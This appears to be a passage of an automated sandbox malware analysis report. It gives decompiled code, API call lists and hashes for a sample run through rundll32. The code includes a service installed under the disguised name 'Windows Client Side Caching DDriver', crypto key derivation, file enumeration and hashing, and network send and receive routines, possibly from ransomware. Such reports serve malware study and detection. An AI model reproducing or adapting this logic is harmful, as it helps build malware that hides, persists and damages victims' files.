                                                                                                                                                  						__imp__CryptDuplicateHash( *((intOrPtr*)(_t78 + 0x40)), 0, 0, _t53);
                                                                                                                                                  						if(_t53 != 0) {
                                                                                                                                                  							__imp__CryptHashData(_a4, _v12 + _t62, 4, 0);
                                                                                                                                                  							if(_t53 != 0) {
                                                                                                                                                  								_t54 =  *(_a16 + 0x44);
                                                                                                                                                  								_a16 = _t54;
                                                                                                                                                  								_t63 = LocalAlloc(0x40, _t54);
                                                                                                                                                  								if(_t63 != 0) {
                                                                                                                                                  									_t56 =  &_a16;
                                                                                                                                                  									__imp__CryptGetHashParam(_a4, 2, _t63, _t56, 0);
                                                                                                                                                  									_v8 = _t56;
                                                                                                                                                  									_t103 = _t56;
                                                                                                                                                  									if(_t103 != 0) {
                                                                                                                                                  										asm("repe cmpsb");
                                                                                                                                                  										 *_a24 = 0 | _t103 == 0x00000000;
                                                                                                                                                  									}
                                                                                                                                                  									LocalFree(_t63);
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							__imp__CryptDestroyHash(_a4);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					UnmapViewOfFile(_v12);
                                                                                                                                                  				}
                                                                                                                                                  				return _v8;
                                                                                                                                                  			}





















                                                                                                                                                  0x04775a80
                                                                                                                                                  0x04775a83
                                                                                                                                                  0x04775a89
                                                                                                                                                  0x04775a8f
                                                                                                                                                  0x04775a92
                                                                                                                                                  0x04775aa1
                                                                                                                                                  0x04775aa4
                                                                                                                                                  0x04775aa6
                                                                                                                                                  0x04775aa9
                                                                                                                                                  0x04775ab4
                                                                                                                                                  0x04775abc
                                                                                                                                                  0x04775ac0
                                                                                                                                                  0x04775ac3
                                                                                                                                                  0x04775acd
                                                                                                                                                  0x04775ad6
                                                                                                                                                  0x04775add
                                                                                                                                                  0x04775aea
                                                                                                                                                  0x04775af0
                                                                                                                                                  0x04775af3
                                                                                                                                                  0x04775af5
                                                                                                                                                  0x04775afb
                                                                                                                                                  0x04775b05
                                                                                                                                                  0x04775b11
                                                                                                                                                  0x04775b17
                                                                                                                                                  0x04775b1a
                                                                                                                                                  0x04775b20
                                                                                                                                                  0x04775baa
                                                                                                                                                  0x04775b26
                                                                                                                                                  0x04775b26
                                                                                                                                                  0x04775b2f
                                                                                                                                                  0x04775b32
                                                                                                                                                  0x04775b3a
                                                                                                                                                  0x04775b49
                                                                                                                                                  0x04775b51
                                                                                                                                                  0x04775b56
                                                                                                                                                  0x04775b5c
                                                                                                                                                  0x04775b65
                                                                                                                                                  0x04775b69
                                                                                                                                                  0x04775b6d
                                                                                                                                                  0x04775b77
                                                                                                                                                  0x04775b7d
                                                                                                                                                  0x04775b80
                                                                                                                                                  0x04775b82
                                                                                                                                                  0x04775b8e
                                                                                                                                                  0x04775b96
                                                                                                                                                  0x04775b96
                                                                                                                                                  0x04775b99
                                                                                                                                                  0x04775b99
                                                                                                                                                  0x04775b69
                                                                                                                                                  0x04775ba2
                                                                                                                                                  0x04775ba2
                                                                                                                                                  0x04775b3a
                                                                                                                                                  0x04775bb4
                                                                                                                                                  0x04775bb4
                                                                                                                                                  0x04775bc1

                                                                                                                                                  APIs
                                                                                                                                                  • GetSystemInfo.KERNELBASE(?,00000000,?,?,?,?,?,?,04775DE8,00000000,?,?,?,00000010,?), ref: 04775A92
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04775AC3
                                                                                                                                                  • MapViewOfFile.KERNELBASE(00000010,00000004,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04775AEA
                                                                                                                                                  • CryptDuplicateHash.ADVAPI32(?,00000000,00000000,00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04775B32
                                                                                                                                                  • CryptHashData.ADVAPI32(00000010,00000010,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04775B49
                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04775B5F
                                                                                                                                                  • CryptGetHashParam.ADVAPI32(00000010,00000002,00000000,?,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04775B77
                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04775B99
                                                                                                                                                  • CryptDestroyHash.ADVAPI32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04775BA2
                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04775BB4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CryptHash$FileLocalView$AllocDataDestroyDuplicateFreeInfoParamSystemUnmapUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                  • String ID: encrypted
                                                                                                                                                  • API String ID: 569730286-1467498611
                                                                                                                                                  • Opcode ID: c88cfe9196ea97602ec0a903a337d3300550053eaffb49d8d4d2babb4a66ab41
                                                                                                                                                  • Instruction ID: f08de222af635792ed8d3e61e66fba2520db81c3e062d27b5aed06b5e2390130
                                                                                                                                                  • Opcode Fuzzy Hash: c88cfe9196ea97602ec0a903a337d3300550053eaffb49d8d4d2babb4a66ab41
                                                                                                                                                  • Instruction Fuzzy Hash: 2D414CB2600209AFEF149F74DC84ABA3BA9FF48354F458028FA05E7240DB75ED05CBA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04771368(void* __ecx) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				void* _t5;
                                                                                                                                                  				void* _t13;
                                                                                                                                                  				void* _t17;
                                                                                                                                                  
                                                                                                                                                  				_t5 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                                                                                                                  				_t13 = _t5;
                                                                                                                                                  				if(_t13 != 0) {
                                                                                                                                                  					_t17 = CreateServiceW(_t13, L"cscc", L"Windows Client Side Caching DDriver", 0xf01ff, 1, 0, 3, L"cscc.dat", L"Filter", 0, L"FltMgr", 0, 0);
                                                                                                                                                  					if(_t17 == 0) {
                                                                                                                                                  						_v8 = GetLastError();
                                                                                                                                                  					} else {
                                                                                                                                                  						_v8 = 0;
                                                                                                                                                  					}
                                                                                                                                                  					if(_t17 != 0) {
                                                                                                                                                  						CloseServiceHandle(_t17);
                                                                                                                                                  					}
                                                                                                                                                  					CloseServiceHandle(_t13);
                                                                                                                                                  				} else {
                                                                                                                                                  					_v8 = GetLastError();
                                                                                                                                                  				}
                                                                                                                                                  				return _v8;
                                                                                                                                                  			}







                                                                                                                                                  0x04771377
                                                                                                                                                  0x0477137d
                                                                                                                                                  0x04771381
                                                                                                                                                  0x047713bc
                                                                                                                                                  0x047713c0
                                                                                                                                                  0x047713cd
                                                                                                                                                  0x047713c2
                                                                                                                                                  0x047713c2
                                                                                                                                                  0x047713c2
                                                                                                                                                  0x047713d8
                                                                                                                                                  0x047713db
                                                                                                                                                  0x047713db
                                                                                                                                                  0x047713de
                                                                                                                                                  0x04771383
                                                                                                                                                  0x04771389
                                                                                                                                                  0x04771389
                                                                                                                                                  0x047713e7

                                                                                                                                                  APIs
                                                                                                                                                  • OpenSCManagerW.SECHOST(00000000,00000000,000F003F,00000000,?,cscc,?,0477154F,00000000,047711D0,?,?,?), ref: 04771377
                                                                                                                                                  • GetLastError.KERNEL32(?,0477154F,00000000,047711D0,?,?,?), ref: 04771383
                                                                                                                                                  • CreateServiceW.ADVAPI32(00000000,cscc,Windows Client Side Caching DDriver,000F01FF,00000001,00000000,00000003,cscc.dat,Filter,00000000,FltMgr,00000000,00000000,?,?,0477154F), ref: 047713B6
                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0477154F,00000000,047711D0,?,?,?), ref: 047713DB
                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0477154F,00000000,047711D0,?,?,?), ref: 047713DE
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Service$CloseHandle$CreateErrorLastManagerOpen
                                                                                                                                                  • String ID: Filter$FltMgr$Windows Client Side Caching DDriver$cscc$cscc.dat
                                                                                                                                                  • API String ID: 2226085316-2908389127
                                                                                                                                                  • Opcode ID: cf819b400d8e1795c16497dc09f39a7b518fd5dd79dc66edfe7d78d6fabedcbd
                                                                                                                                                  • Instruction ID: 475a03836bcddd4e1deda9db0042ea22307972bbcd9c817e548f7deaca517ad4
                                                                                                                                                  • Opcode Fuzzy Hash: cf819b400d8e1795c16497dc09f39a7b518fd5dd79dc66edfe7d78d6fabedcbd
                                                                                                                                                  • Instruction Fuzzy Hash: 6E01A271BC2324BBC7216BA69C4DD9F7F6CDF05BA1B814415B505B3700D5F46901CBA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                  			E04772054(intOrPtr _a4, void* _a8, short* _a12, intOrPtr* _a16, intOrPtr _a20) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				long _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  				intOrPtr* _t40;
                                                                                                                                                  				long _t42;
                                                                                                                                                  				void* _t49;
                                                                                                                                                  				intOrPtr* _t50;
                                                                                                                                                  				short _t51;
                                                                                                                                                  				void* _t54;
                                                                                                                                                  				void* _t59;
                                                                                                                                                  				void* _t61;
                                                                                                                                                  				signed int _t62;
                                                                                                                                                  				intOrPtr _t64;
                                                                                                                                                  				char _t66;
                                                                                                                                                  				intOrPtr _t68;
                                                                                                                                                  				void* _t76;
                                                                                                                                                  				intOrPtr* _t77;
                                                                                                                                                  				void* _t78;
                                                                                                                                                  
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_t38 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                  				_v16 = _t38;
                                                                                                                                                  				if(_t38 == 0) {
                                                                                                                                                  					L14:
                                                                                                                                                  					return _v5;
                                                                                                                                                  				}
                                                                                                                                                  				_t40 = _a16;
                                                                                                                                                  				_t61 = _t40 + 1;
                                                                                                                                                  				do {
                                                                                                                                                  					_t68 =  *_t40;
                                                                                                                                                  					_t40 = _t40 + 1;
                                                                                                                                                  				} while (_t68 != 0);
                                                                                                                                                  				_t42 = _t40 - _t61 + 0x58;
                                                                                                                                                  				_v12 = _t42;
                                                                                                                                                  				_t59 = HeapAlloc(GetProcessHeap(), 8, _t42);
                                                                                                                                                  				if(_t59 == 0) {
                                                                                                                                                  					L13:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                                                                  					goto L14;
                                                                                                                                                  				}
                                                                                                                                                  				_t62 = 9;
                                                                                                                                                  				_t49 = memcpy(_t59, _a8, _t62 << 2);
                                                                                                                                                  				__imp__#9(_v12 + 0xfffffffc);
                                                                                                                                                  				 *(_t59 + 2) = _t49;
                                                                                                                                                  				_t50 = _a16;
                                                                                                                                                  				 *((char*)(_t59 + 8)) = 0xa2;
                                                                                                                                                  				 *((short*)(_t59 + 0x24)) = 0xff18;
                                                                                                                                                  				_t76 = _t50 + 1;
                                                                                                                                                  				do {
                                                                                                                                                  					_t64 =  *_t50;
                                                                                                                                                  					_t50 = _t50 + 1;
                                                                                                                                                  				} while (_t64 != 0);
                                                                                                                                                  				_t51 = _t50 - _t76;
                                                                                                                                                  				_t77 = _a16;
                                                                                                                                                  				 *((short*)(_t59 + 0x2a)) = _t51;
                                                                                                                                                  				 *((short*)(_t59 + 0x55)) = _t51 + 1;
                                                                                                                                                  				_t18 = _t59 + 0x57; // 0x57
                                                                                                                                                  				 *((intOrPtr*)(_t59 + 0x2c)) = 0x16;
                                                                                                                                                  				 *((intOrPtr*)(_t59 + 0x34)) = 0x2019f;
                                                                                                                                                  				 *((intOrPtr*)(_t59 + 0x44)) = 3;
                                                                                                                                                  				 *((intOrPtr*)(_t59 + 0x48)) = _a20;
                                                                                                                                                  				 *((intOrPtr*)(_t59 + 0x4c)) = 0x40;
                                                                                                                                                  				 *((intOrPtr*)(_t59 + 0x50)) = 2;
                                                                                                                                                  				 *((char*)(_t59 + 0x54)) = 3;
                                                                                                                                                  				_t54 = _t18 - _t77;
                                                                                                                                                  				do {
                                                                                                                                                  					_t66 =  *_t77;
                                                                                                                                                  					 *((char*)(_t54 + _t77)) = _t66;
                                                                                                                                                  					_t77 = _t77 + 1;
                                                                                                                                                  				} while (_t66 != 0);
                                                                                                                                                  				__imp__#19(_a4, _t59, _v12, 0); // executed
                                                                                                                                                  				if(_t54 > 0) {
                                                                                                                                                  					_t78 = _v16;
                                                                                                                                                  					__imp__#16(_a4, _t78, 0xffff, 0); // executed
                                                                                                                                                  					if(_t54 > 0 &&  *((intOrPtr*)(_t78 + 9)) == 0) {
                                                                                                                                                  						 *_a12 =  *((intOrPtr*)(_t78 + 0x2a));
                                                                                                                                                  						_v5 = 1;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				HeapFree(GetProcessHeap(), 8, _t59);
                                                                                                                                                  				goto L13;
                                                                                                                                                  			}






















                                                                                                                                                  0x04772069
                                                                                                                                                  0x04772076
                                                                                                                                                  0x04772078
                                                                                                                                                  0x0477207d
                                                                                                                                                  0x04772188
                                                                                                                                                  0x0477218e
                                                                                                                                                  0x0477218e
                                                                                                                                                  0x04772083
                                                                                                                                                  0x04772086
                                                                                                                                                  0x04772089
                                                                                                                                                  0x04772089
                                                                                                                                                  0x0477208b
                                                                                                                                                  0x0477208c
                                                                                                                                                  0x04772093
                                                                                                                                                  0x04772099
                                                                                                                                                  0x047720a1
                                                                                                                                                  0x047720a5
                                                                                                                                                  0x04772175
                                                                                                                                                  0x04772181
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04772187
                                                                                                                                                  0x047720b3
                                                                                                                                                  0x047720ba
                                                                                                                                                  0x047720bc
                                                                                                                                                  0x047720c2
                                                                                                                                                  0x047720c6
                                                                                                                                                  0x047720c9
                                                                                                                                                  0x047720cd
                                                                                                                                                  0x047720d3
                                                                                                                                                  0x047720d6
                                                                                                                                                  0x047720d6
                                                                                                                                                  0x047720d8
                                                                                                                                                  0x047720d9
                                                                                                                                                  0x047720e0
                                                                                                                                                  0x047720e2
                                                                                                                                                  0x047720e5
                                                                                                                                                  0x047720ea
                                                                                                                                                  0x047720ee
                                                                                                                                                  0x047720f1
                                                                                                                                                  0x047720f8
                                                                                                                                                  0x047720ff
                                                                                                                                                  0x04772106
                                                                                                                                                  0x04772109
                                                                                                                                                  0x04772110
                                                                                                                                                  0x04772117
                                                                                                                                                  0x0477211b
                                                                                                                                                  0x0477211d
                                                                                                                                                  0x0477211d
                                                                                                                                                  0x0477211f
                                                                                                                                                  0x04772122
                                                                                                                                                  0x04772123
                                                                                                                                                  0x04772131
                                                                                                                                                  0x04772139
                                                                                                                                                  0x0477213b
                                                                                                                                                  0x04772148
                                                                                                                                                  0x04772150
                                                                                                                                                  0x0477215e
                                                                                                                                                  0x04772161
                                                                                                                                                  0x04772161
                                                                                                                                                  0x04772150
                                                                                                                                                  0x0477216f
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,0477943A), ref: 0477206D
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,0477943A), ref: 04772076
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,0477943A), ref: 0477209C
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,0477943A), ref: 0477209F
                                                                                                                                                  • htons.WS2_32(?), ref: 047720BC
                                                                                                                                                  • send.WS2_32(?,00000000,?,00000000), ref: 04772131
                                                                                                                                                  • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04772148
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0477943A), ref: 04772168
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,0477943A), ref: 0477216F
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,0477943A), ref: 0477217A
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,0477943A), ref: 04772181
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocFree$htonsrecvsend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1780562090-0
                                                                                                                                                  • Opcode ID: 38829267c5d1bfec308e17bba0cc89fcb217301f39f87491d5318c32b63494cb
                                                                                                                                                  • Instruction ID: ffee9f05b715791a7ab06f11a550ff1eded8415030dcdb4650c1c4c69856f8b6
                                                                                                                                                  • Opcode Fuzzy Hash: 38829267c5d1bfec308e17bba0cc89fcb217301f39f87491d5318c32b63494cb
                                                                                                                                                  • Instruction Fuzzy Hash: 5141C775500246ABDF118FA8DD88A9A7FB8FF49344F048098FA54AB392DB75D809CB60
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                  			E04776299(void* __ecx, void* _a4) {
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* _t12;
                                                                                                                                                  				char* _t13;
                                                                                                                                                  				void* _t16;
                                                                                                                                                  				void* _t19;
                                                                                                                                                  				void* _t22;
                                                                                                                                                  				void* _t26;
                                                                                                                                                  				int _t31;
                                                                                                                                                  				void* _t32;
                                                                                                                                                  				void* _t33;
                                                                                                                                                  				void* _t34;
                                                                                                                                                  				long** _t36;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  
                                                                                                                                                  				_t33 = __ecx;
                                                                                                                                                  				_t31 = 0;
                                                                                                                                                  				_t12 = CreateEventW(0, 1, 0, 0);
                                                                                                                                                  				_t38 = _a4;
                                                                                                                                                  				 *(_t38 + 0x48) = _t12;
                                                                                                                                                  				if(_t12 != 0) {
                                                                                                                                                  					_t36 = _t38 + 0x30;
                                                                                                                                                  					_t16 = E04775507(_t36); // executed
                                                                                                                                                  					if(_t16 != 0) {
                                                                                                                                                  						_t19 = E04775613( *_t36,  *((intOrPtr*)(_t38 + 0x34)), _t38 + 0x38); // executed
                                                                                                                                                  						if(_t19 != 0) {
                                                                                                                                                  							_t22 = E04776085(_t38, _t33); // executed
                                                                                                                                                  							if(_t22 != 0) {
                                                                                                                                                  								if(E04776246(_t33, _t38) != 0) {
                                                                                                                                                  									_t26 = CreateThread(0, 0, E047760F9, _t38, 0, 0); // executed
                                                                                                                                                  									_t32 = _t26;
                                                                                                                                                  									E04775E9F(_t38 + 4, 0x11, _t38); // executed
                                                                                                                                                  									if(_t32 != 0) {
                                                                                                                                                  										WaitForSingleObject(_t32, 0xffffffff);
                                                                                                                                                  										CloseHandle(_t32);
                                                                                                                                                  									}
                                                                                                                                                  									__imp__CryptDestroyHash( *((intOrPtr*)(_t38 + 0x40)));
                                                                                                                                                  									_t31 = 0;
                                                                                                                                                  								}
                                                                                                                                                  								CryptDestroyKey( *(_t38 + 0x3c));
                                                                                                                                                  							}
                                                                                                                                                  							CryptDestroyKey( *(_t38 + 0x38));
                                                                                                                                                  						}
                                                                                                                                                  						CryptReleaseContext( *_t36, _t31);
                                                                                                                                                  					}
                                                                                                                                                  					CloseHandle( *(_t38 + 0x48));
                                                                                                                                                  				}
                                                                                                                                                  				_t34 = 0x21;
                                                                                                                                                  				_t13 = _t38 + 0xc;
                                                                                                                                                  				do {
                                                                                                                                                  					 *_t13 = 0;
                                                                                                                                                  					_t13 = _t13 + 1;
                                                                                                                                                  					_t34 = _t34 - 1;
                                                                                                                                                  				} while (_t34 != 0);
                                                                                                                                                  				LocalFree(_t38);
                                                                                                                                                  				return 0;
                                                                                                                                                  			}
















                                                                                                                                                  0x04776299
                                                                                                                                                  0x0477629e
                                                                                                                                                  0x047762a5
                                                                                                                                                  0x047762ab
                                                                                                                                                  0x047762ae
                                                                                                                                                  0x047762b3
                                                                                                                                                  0x047762ba
                                                                                                                                                  0x047762be
                                                                                                                                                  0x047762c5
                                                                                                                                                  0x047762d0
                                                                                                                                                  0x047762d7
                                                                                                                                                  0x047762db
                                                                                                                                                  0x047762e2
                                                                                                                                                  0x047762eb
                                                                                                                                                  0x047762f7
                                                                                                                                                  0x047762fe
                                                                                                                                                  0x04776306
                                                                                                                                                  0x0477630d
                                                                                                                                                  0x04776312
                                                                                                                                                  0x04776319
                                                                                                                                                  0x04776319
                                                                                                                                                  0x04776322
                                                                                                                                                  0x04776328
                                                                                                                                                  0x04776328
                                                                                                                                                  0x0477632d
                                                                                                                                                  0x0477632d
                                                                                                                                                  0x04776336
                                                                                                                                                  0x04776336
                                                                                                                                                  0x0477633f
                                                                                                                                                  0x0477633f
                                                                                                                                                  0x04776348
                                                                                                                                                  0x0477634e
                                                                                                                                                  0x04776351
                                                                                                                                                  0x04776352
                                                                                                                                                  0x04776355
                                                                                                                                                  0x04776355
                                                                                                                                                  0x04776358
                                                                                                                                                  0x04776359
                                                                                                                                                  0x04776359
                                                                                                                                                  0x0477635d
                                                                                                                                                  0x04776368

                                                                                                                                                  APIs
                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 047762A5
                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 0477635D
                                                                                                                                                    • Part of subcall function 04775507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,047762C3,?), ref: 04775520
                                                                                                                                                    • Part of subcall function 04775507: GetLastError.KERNEL32(?,047762C3,?), ref: 04775528
                                                                                                                                                    • Part of subcall function 04775507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,047762C3,?), ref: 0477553E
                                                                                                                                                  • CloseHandle.KERNEL32(?,?), ref: 04776348
                                                                                                                                                    • Part of subcall function 04775613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04775636
                                                                                                                                                    • Part of subcall function 04775613: LocalAlloc.KERNEL32(00000040,?,00000000), ref: 0477564C
                                                                                                                                                    • Part of subcall function 04775613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04775662
                                                                                                                                                    • Part of subcall function 04775613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04775682
                                                                                                                                                    • Part of subcall function 04775613: LocalAlloc.KERNEL32(00000040,?), ref: 0477568D
                                                                                                                                                    • Part of subcall function 04775613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 047756A6
                                                                                                                                                    • Part of subcall function 04775613: CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 047756B5
                                                                                                                                                    • Part of subcall function 04775613: LocalFree.KERNEL32(00000000), ref: 047756BF
                                                                                                                                                    • Part of subcall function 04775613: LocalFree.KERNEL32(?), ref: 047756C8
                                                                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?), ref: 0477633F
                                                                                                                                                    • Part of subcall function 04776085: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,047762E0,?,?,?,?), ref: 047760A6
                                                                                                                                                    • Part of subcall function 04776085: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,047762E0,?,?,?,?), ref: 047760BA
                                                                                                                                                    • Part of subcall function 04776085: CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,047762E0,?,?,?,?), ref: 047760D3
                                                                                                                                                    • Part of subcall function 04776085: CryptDestroyHash.ADVAPI32(?,?,?,?,047762E0,?,?,?,?), ref: 047760DF
                                                                                                                                                  • CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 04776336
                                                                                                                                                    • Part of subcall function 04776246: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,047762E9,?,?,?,?), ref: 04776260
                                                                                                                                                    • Part of subcall function 04776246: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,047762E9,?,?,?,?), ref: 04776273
                                                                                                                                                    • Part of subcall function 04776246: CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,047762E9,?,?,?,?), ref: 04776289
                                                                                                                                                  • CreateThread.KERNELBASE ref: 047762F7
                                                                                                                                                    • Part of subcall function 04775E9F: PathCombineW.SHLWAPI(?,?,04781554,?,?), ref: 04775EC8
                                                                                                                                                    • Part of subcall function 04775E9F: FindFirstFileW.KERNELBASE(?,?), ref: 04775EE3
                                                                                                                                                    • Part of subcall function 04775E9F: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04775F09
                                                                                                                                                    • Part of subcall function 04775E9F: PathCombineW.SHLWAPI(?,?,?), ref: 04775FB1
                                                                                                                                                    • Part of subcall function 04775E9F: StrStrIW.SHLWAPI(?,04783014), ref: 04775FE9
                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000011,?), ref: 04776312
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 04776319
                                                                                                                                                  • CryptDestroyHash.ADVAPI32(?,?,00000011,?), ref: 04776322
                                                                                                                                                  • CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 0477632D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Crypt$Hash$Local$CreateDestroy$ContextFreeObject$AcquireAllocBinaryCloseCombineDataDecodeHandlePathStringWait$DeriveErrorEventFileFindFirstImportInfoLastMultipleObjectsParamPublicReleaseSingleThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2692407486-0
                                                                                                                                                  • Opcode ID: d4d6da4b107c986d9488a07089359c52c29d7101aa1c598938be81444188e5a2
                                                                                                                                                  • Instruction ID: 5f28d3252b17ad911aba8e63940149162294e6266419d676df02d878ca80b844
                                                                                                                                                  • Opcode Fuzzy Hash: d4d6da4b107c986d9488a07089359c52c29d7101aa1c598938be81444188e5a2
                                                                                                                                                  • Instruction Fuzzy Hash: B5213071100A05AFFF216B71ED88DA77BADEF08365B845829FA42D1654DB65FC42CB20
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
